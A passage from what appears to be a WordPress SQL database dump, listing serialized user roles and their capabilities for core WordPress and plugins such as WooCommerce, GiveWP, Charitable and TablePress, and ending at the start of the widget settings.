1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"aioseo_manage_seo\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;s:18:\"edit_wpse_profiles\";b:1;s:25:\"edit_others_wpse_profiles\";b:1;s:20:\"create_wpse_profiles\";b:1;s:21:\"publish_wpse_profiles\";b:1;s:20:\"delete_wpse_profiles\";b:1;s:27:\"delete_others_wpse_profiles\";b:1;s:17:\"read_wpse_profile\";b:1;s:26:\"read_private_wpse_profiles\";b:1;s:20:\"wpfd_create_category\";b:1;s:18:\"wpfd_edit_category\";b:1;s:22:\"wpfd_edit_own_category\";b:1;s:20:\"wpfd_delete_category\";b:1;s:16:\"wpfd_manage_file\";b:1;s:12:\"edit_contest\";b:1;s:12:\"read_contest\";b:1;s:14:\"delete_contest\";b:1;s:13:\"edit_contests\";b:1;s:15:\"delete_contests\";b:1;s:16:\"publish_contests\";b:1;s:20:\"edit_others_contests\";b:1;s:22:\"delete_others_contests\";b:1;s:23:\"edit_published_contests\";b:1;s:25:\"delete_published_contests\";b:1;s:21:\"read_private_contests\";b:1;s:21:\"edit_private_contests\";b:1;s:23:\"delete_private_contests\";b:1;s:15:\"create_contests\";b:1;s:23:\"edit_contest_submission\";b:1;s:23:\"read_contest_submission\";b:1;s:25:\"delete_contest_submission\";b:1;s:24:\"edit_contest_submissions\";b:1;s:26:\"delete_contest_submissions\";b:1;s:27:\"publish_contest_submissions\";b:1;s:31:\"edit_others_contest_submissions\";b:1;s:33:\"delete_others_contest_submissions\";b:1;s:34:\"edit_published_contest_submissions\";b:1;s:36:\"delete_published_contest_submissions\";b:1;s:32:\"read_private_contest_submissions\";b:1;s:32:\"edit_private_contest_submissions\";b:1;s:34:\"delete_private_contest_submissions\";b:1;s:26:\"create_contest_submissions\";b:1;s:11:\"bp_moderate\";b:1;s:17:\"manage_forminator\";b:1;s:17:\"view_give_reports\";b:1;s:24:\"view_give_sensitive_data\";b:1;s:19:\"export_give_reports\";b:1;s:20:\"manage_give_settings\";b:1;s:18:\"view_give_payments\";b:1;s:15:\"edit_give_forms\";b:1;s:22:\"edit_others_give_forms\";b:1;s:18:\"publish_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:17:\"delete_give_forms\";b:1;s:25:\"delete_private_give_forms\";b:1;s:27:\"delete_published_give_forms\";b:1;s:24:\"delete_others_give_forms\";b:1;s:23:\"edit_private_give_forms\";b:1;s:25:\"edit_published_give_forms\";b:1;s:22:\"manage_give_form_terms\";b:1;s:20:\"edit_give_form_terms\";b:1;s:22:\"delete_give_form_terms\";b:1;s:22:\"assign_give_form_terms\";b:1;s:20:\"view_give_form_stats\";b:1;s:17:\"import_give_forms\";b:1;s:18:\"edit_give_payments\";b:1;s:25:\"edit_others_give_payments\";b:1;s:21:\"publish_give_payments\";b:1;s:26:\"read_private_give_payments\";b:1;s:20:\"delete_give_payments\";b:1;s:28:\"delete_private_give_payments\";b:1;s:30:\"delete_published_give_payments\";b:1;s:27:\"delete_others_give_payments\";b:1;s:26:\"edit_private_give_payments\";b:1;s:28:\"edit_published_give_payments\";b:1;s:25:\"manage_give_payment_terms\";b:1;s:23:\"edit_give_payment_terms\";b:1;s:25:\"delete_give_payment_terms\";b:1;s:25:\"assign_give_payment_terms\";b:1;s:23:\"view_give_payment_stats\";b:1;s:20:\"import_give_payments\";b:1;s:30:\"view_charitable_sensitive_data\";b:1;s:25:\"export_charitable_reports\";b:1;s:26:\"manage_charitable_settings\";b:1;s:13:\"edit_campaign\";b:1;s:13:\"read_campaign\";b:1;s:15:\"delete_campaign\";b:1;s:14:\"edit_campaigns\";b:1;s:21:\"edit_others_campaigns\";b:1;s:17:\"publish_campaigns\";b:1;s:22:\"read_private_campaigns\";b:1;s:16:\"delete_campaigns\";b:1;s:24:\"delete_private_campaigns\";b:1;s:26:\"delete_published_campaigns\";b:1;s:23:\"delete_others_campaigns\";b:1;s:22:\"edit_private_campaigns\";b:1;s:24:\"edit_published_campaigns\";b:1;s:13:\"edit_donation\";b:1;s:13:\"read_donation\";b:1;s:15:\"delete_donation\";b:1;s:14:\"edit_donations\";b:1;s:21:\"edit_others_donations\";b:1;s:17:\"publish_donations\";b:1;s:22:\"read_private_donations\";b:1;s:16:\"delete_donations\";b:1;s:24:\"delete_private_donations\";b:1;s:26:\"delete_published_donations\";b:1;s:23:\"delete_others_donations\";b:1;s:22:\"edit_private_donations\";b:1;s:24:\"edit_published_donations\";b:1;s:21:\"manage_campaign_terms\";b:1;s:19:\"edit_campaign_terms\";b:1;s:21:\"delete_campaign_terms\";b:1;s:21:\"assign_campaign_terms\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:23:\"tablepress_edit_options\";b:1;s:11:\"edit_jb-job\";b:1;s:11:\"read_jb-job\";b:1;s:13:\"delete_jb-job\";b:1;s:12:\"edit_jb-jobs\";b:1;s:19:\"edit_others_jb-jobs\";b:1;s:15:\"publish_jb-jobs\";b:1;s:20:\"read_private_jb-jobs\";b:1;s:14:\"delete_jb-jobs\";b:1;s:22:\"delete_private_jb-jobs\";b:1;s:24:\"delete_published_jb-jobs\";b:1;s:21:\"delete_others_jb-jobs\";b:1;s:20:\"edit_private_jb-jobs\";b:1;s:22:\"edit_published_jb-jobs\";b:1;s:14:\"create_jb-jobs\";b:1;s:19:\"manage_jb-job-types\";b:1;s:17:\"edit_jb-job-types\";b:1;s:19:\"delete_jb-job-types\";b:1;s:24:\"manage_jb-job-categories\";b:1;s:22:\"edit_jb-job-categories\";b:1;s:24:\"delete_jb-job-categories\";b:1;s:28:\"tablepress_import_tables_url\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:85:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;s:17:\"read_wpse_profile\";b:1;s:26:\"read_private_wpse_profiles\";b:1;s:18:\"edit_wpse_profiles\";b:1;s:20:\"wpfd_create_category\";b:1;s:18:\"wpfd_edit_category\";b:1;s:22:\"wpfd_edit_own_category\";b:1;s:20:\"wpfd_delete_category\";b:1;s:16:\"wpfd_manage_file\";b:1;s:12:\"edit_contest\";b:1;s:12:\"read_contest\";b:1;s:14:\"delete_contest\";b:1;s:13:\"edit_contests\";b:1;s:15:\"delete_contests\";b:1;s:16:\"publish_contests\";b:1;s:20:\"edit_others_contests\";b:1;s:22:\"delete_others_contests\";b:1;s:23:\"edit_published_contests\";b:1;s:25:\"delete_published_contests\";b:1;s:21:\"read_private_contests\";b:1;s:21:\"edit_private_contests\";b:1;s:23:\"delete_private_contests\";b:1;s:15:\"create_contests\";b:1;s:23:\"edit_contest_submission\";b:1;s:23:\"read_contest_submission\";b:1;s:25:\"delete_contest_submission\";b:1;s:24:\"edit_contest_submissions\";b:1;s:26:\"delete_contest_submissions\";b:1;s:27:\"publish_contest_submissions\";b:1;s:31:\"edit_others_contest_submissions\";b:1;s:33:\"delete_others_contest_submissions\";b:1;s:34:\"edit_published_contest_submissions\";b:1;s:36:\"delete_published_contest_submissions\";b:1;s:32:\"read_private_contest_submissions\";b:1;s:32:\"edit_private_contest_submissions\";b:1;s:34:\"delete_private_contest_submissions\";b:1;s:26:\"create_contest_submissions\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:28:\"tablepress_import_tables_url\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:45:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;s:18:\"edit_wpse_profiles\";b:1;s:17:\"read_wpse_profile\";b:1;s:26:\"read_private_wpse_profiles\";b:1;s:12:\"edit_contest\";b:1;s:12:\"read_contest\";b:1;s:14:\"delete_contest\";b:1;s:13:\"edit_contests\";b:1;s:15:\"delete_contests\";b:1;s:16:\"publish_contests\";b:1;s:23:\"edit_published_contests\";b:1;s:25:\"delete_published_contests\";b:1;s:15:\"create_contests\";b:1;s:23:\"edit_contest_submission\";b:1;s:23:\"read_contest_submission\";b:1;s:25:\"delete_contest_submission\";b:1;s:24:\"edit_contest_submissions\";b:1;s:26:\"delete_contest_submissions\";b:1;s:27:\"publish_contest_submissions\";b:1;s:34:\"edit_published_contest_submissions\";b:1;s:36:\"delete_published_contest_submissions\";b:1;s:26:\"create_contest_submissions\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:12:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;s:17:\"read_wpse_profile\";b:1;s:26:\"read_private_wpse_profiles\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:17:\"dc_pending_vendor\";a:2:{s:4:\"name\";s:14:\"Pending Vendor\";s:12:\"capabilities\";a:3:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:0;s:12:\"delete_posts\";b:0;}}s:18:\"dc_rejected_vendor\";a:2:{s:4:\"name\";s:15:\"Rejected Vendor\";s:12:\"capabilities\";a:3:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:0;s:12:\"delete_posts\";b:0;}}s:9:\"dc_vendor\";a:2:{s:4:\"name\";s:6:\"Vendor\";s:12:\"capabilities\";a:25:{s:4:\"read\";b:1;s:14:\"manage_product\";b:1;s:9:\"edit_post\";b:1;s:10:\"edit_posts\";b:1;s:12:\"delete_posts\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:20:\"assign_product_terms\";b:1;s:12:\"upload_files\";b:1;s:12:\"read_product\";b:1;s:16:\"read_shop_coupon\";b:1;s:16:\"edit_shop_orders\";b:1;s:12:\"edit_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:15:\"delete_products\";b:1;s:16:\"publish_products\";b:0;s:23:\"edit_published_products\";b:1;s:25:\"delete_published_products\";b:1;s:16:\"edit_shop_coupon\";b:0;s:17:\"edit_shop_coupons\";b:0;s:18:\"delete_shop_coupon\";b:0;s:19:\"delete_shop_coupons\";b:0;s:20:\"publish_shop_coupons\";b:0;s:27:\"edit_published_shop_coupons\";b:0;s:29:\"delete_published_shop_coupons\";b:0;}}s:8:\"customer\";a:2:{s:4:\"name\";s:8:\"Customer\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:12:\"shop_manager\";a:2:{s:4:\"name\";s:12:\"Shop manager\";s:12:\"capabilities\";a:97:{s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:17:\"edit_others_pages\";b:1;s:13:\"publish_posts\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_posts\";b:1;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:19:\"delete_others_pages\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:10:\"list_users\";b:1;s:18:\"edit_theme_options\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;}}s:11:\"wcfm_vendor\";a:2:{s:4:\"name\";s:12:\"Store Vendor\";s:12:\"capabilities\";a:51:{s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:9:\"edit_post\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:12:\"delete_posts\";b:1;s:17:\"edit_shop_coupons\";b:1;s:19:\"manage_shop_coupons\";b:1;s:17:\"read_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:12:\"upload_files\";b:1;s:18:\"delete_attachments\";b:1;s:15:\"unfiltered_html\";b:1;s:20:\"assign_product_terms\";b:1;s:14:\"manage_product\";b:1;s:12:\"read_product\";b:1;s:16:\"read_shop_coupon\";b:1;s:12:\"edit_product\";b:1;s:14:\"delete_product\";b:1;s:15:\"delete_products\";b:1;s:25:\"delete_published_products\";b:1;s:23:\"edit_published_products\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"manage_woocommerce\";b:1;s:19:\"publish_shop_orders\";b:1;s:10:\"list_users\";b:1;s:12:\"create_users\";b:1;s:22:\"manage_woocommerce_pos\";b:1;s:22:\"access_woocommerce_pos\";b:1;s:18:\"read_private_posts\";b:1;s:21:\"read_private_products\";b:1;s:24:\"read_private_shop_orders\";b:1;s:16:\"publish_foosales\";b:1;s:13:\"edit_products\";b:1;s:15:\"manage_products\";b:1;s:13:\"read_products\";b:1;}}s:14:\"disable_vendor\";a:2:{s:4:\"name\";s:14:\"Disable Vendor\";s:12:\"capabilities\";a:1:{s:7:\"level_0\";b:1;}}s:30:\"contest_gallery_user_since_v14\";a:2:{s:4:\"name\";s:30:\"Contest Gallery User since v14\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:9:\"wpc_judge\";a:2:{s:4:\"name\";s:26:\"Photography Contest Judge \";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:14:\"wpc_contestant\";a:2:{s:4:\"name\";s:10:\"Contestant\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:11:\"ml_app_user\";a:2:{s:4:\"name\";s:8:\"App User\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:8:\"app_user\";a:2:{s:4:\"name\";s:8:\"App User\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:12:\"give_manager\";a:2:{s:4:\"name\";s:14:\"GiveWP Manager\";s:12:\"capabilities\";a:65:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:1;s:12:\"delete_posts\";b:1;s:15:\"unfiltered_html\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:0;s:6:\"import\";b:0;s:19:\"delete_others_pages\";b:0;s:19:\"delete_others_posts\";b:0;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:17:\"edit_others_pages\";b:0;s:17:\"edit_others_posts\";b:0;s:10:\"edit_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:17:\"manage_categories\";b:0;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:13:\"publish_pages\";b:1;s:13:\"publish_posts\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:17:\"view_give_reports\";b:1;s:24:\"view_give_sensitive_data\";b:1;s:19:\"export_give_reports\";b:1;s:20:\"manage_give_settings\";b:1;s:18:\"view_give_payments\";b:1;s:15:\"edit_give_forms\";b:1;s:22:\"edit_others_give_forms\";b:1;s:18:\"publish_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:17:\"delete_give_forms\";b:1;s:25:\"delete_private_give_forms\";b:1;s:27:\"delete_published_give_forms\";b:1;s:24:\"delete_others_give_forms\";b:1;s:23:\"edit_private_give_forms\";b:1;s:25:\"edit_published_give_forms\";b:1;s:22:\"manage_give_form_terms\";b:1;s:20:\"edit_give_form_terms\";b:1;s:22:\"delete_give_form_terms\";b:1;s:22:\"assign_give_form_terms\";b:1;s:20:\"view_give_form_stats\";b:1;s:17:\"import_give_forms\";b:1;s:18:\"edit_give_payments\";b:1;s:25:\"edit_others_give_payments\";b:1;s:21:\"publish_give_payments\";b:1;s:26:\"read_private_give_payments\";b:1;s:20:\"delete_give_payments\";b:1;s:28:\"delete_private_give_payments\";b:1;s:30:\"delete_published_give_payments\";b:1;s:27:\"delete_others_give_payments\";b:1;s:26:\"edit_private_give_payments\";b:1;s:28:\"edit_published_give_payments\";b:1;s:25:\"manage_give_payment_terms\";b:1;s:23:\"edit_give_payment_terms\";b:1;s:25:\"delete_give_payment_terms\";b:1;s:25:\"assign_give_payment_terms\";b:1;s:23:\"view_give_payment_stats\";b:1;s:20:\"import_give_payments\";b:1;}}s:15:\"give_accountant\";a:2:{s:4:\"name\";s:17:\"GiveWP Accountant\";s:12:\"capabilities\";a:9:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:0;s:12:\"delete_posts\";b:0;s:15:\"edit_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:17:\"view_give_reports\";b:1;s:19:\"export_give_reports\";b:1;s:18:\"edit_give_payments\";b:1;s:18:\"view_give_payments\";b:1;}}s:11:\"give_worker\";a:2:{s:4:\"name\";s:13:\"GiveWP Worker\";s:12:\"capabilities\";a:16:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:12:\"upload_files\";b:1;s:12:\"delete_posts\";b:0;s:18:\"edit_give_payments\";b:1;s:17:\"delete_give_forms\";b:1;s:24:\"delete_others_give_forms\";b:1;s:25:\"delete_private_give_forms\";b:1;s:27:\"delete_published_give_forms\";b:1;s:15:\"edit_give_forms\";b:1;s:22:\"edit_others_give_forms\";b:1;s:23:\"edit_private_give_forms\";b:1;s:25:\"edit_published_give_forms\";b:1;s:18:\"publish_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;}}s:10:\"give_donor\";a:2:{s:4:\"name\";s:12:\"GiveWP Donor\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:16:\"campaign_manager\";a:2:{s:4:\"name\";s:16:\"Campaign Manager\";s:12:\"capabilities\";a:60:{s:4:\"read\";b:1;s:12:\"delete_posts\";b:1;s:10:\"edit_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:12:\"upload_files\";b:1;s:20:\"edit_published_posts\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:12:\"delete_pages\";b:1;s:13:\"publish_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:17:\"edit_others_pages\";b:1;s:10:\"edit_pages\";b:1;s:17:\"edit_others_posts\";b:1;s:12:\"manage_links\";b:1;s:17:\"manage_categories\";b:1;s:17:\"moderate_comments\";b:1;s:6:\"import\";b:1;s:6:\"export\";b:1;s:15:\"unfiltered_html\";b:0;s:30:\"view_charitable_sensitive_data\";b:1;s:25:\"export_charitable_reports\";b:1;s:13:\"edit_campaign\";b:1;s:13:\"read_campaign\";b:1;s:15:\"delete_campaign\";b:1;s:14:\"edit_campaigns\";b:1;s:21:\"edit_others_campaigns\";b:1;s:17:\"publish_campaigns\";b:1;s:22:\"read_private_campaigns\";b:1;s:16:\"delete_campaigns\";b:1;s:24:\"delete_private_campaigns\";b:1;s:26:\"delete_published_campaigns\";b:1;s:23:\"delete_others_campaigns\";b:1;s:22:\"edit_private_campaigns\";b:1;s:24:\"edit_published_campaigns\";b:1;s:13:\"edit_donation\";b:1;s:13:\"read_donation\";b:1;s:15:\"delete_donation\";b:1;s:14:\"edit_donations\";b:1;s:21:\"edit_others_donations\";b:1;s:17:\"publish_donations\";b:1;s:22:\"read_private_donations\";b:1;s:16:\"delete_donations\";b:1;s:24:\"delete_private_donations\";b:1;s:26:\"delete_published_donations\";b:1;s:23:\"delete_others_donations\";b:1;s:22:\"edit_private_donations\";b:1;s:24:\"edit_published_donations\";b:1;s:21:\"manage_campaign_terms\";b:1;s:19:\"edit_campaign_terms\";b:1;s:21:\"delete_campaign_terms\";b:1;s:21:\"assign_campaign_terms\";b:1;}}s:5:\"donor\";a:2:{s:4:\"name\";s:5:\"Donor\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:8:\"armember\";a:2:{s:4:\"name\";s:8:\"ARMember\";s:12:\"capabilities\";a:3:{s:8:\"armember\";b:1;s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:11:\"jb_employer\";a:2:{s:4:\"name\";s:8:\"Employer\";s:12:\"capabilities\";a:6:{i:0;s:11:\"edit_jb-job\";i:1;s:11:\"read_jb-job\";i:2;s:13:\"delete_jb-job\";s:11:\"edit_jb-job\";b:1;s:11:\"read_jb-job\";b:1;s:13:\"delete_jb-job\";b:1;}}}','yes'),(101,'fresh_site','0','off'),(102,'widget_block','a:8:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- 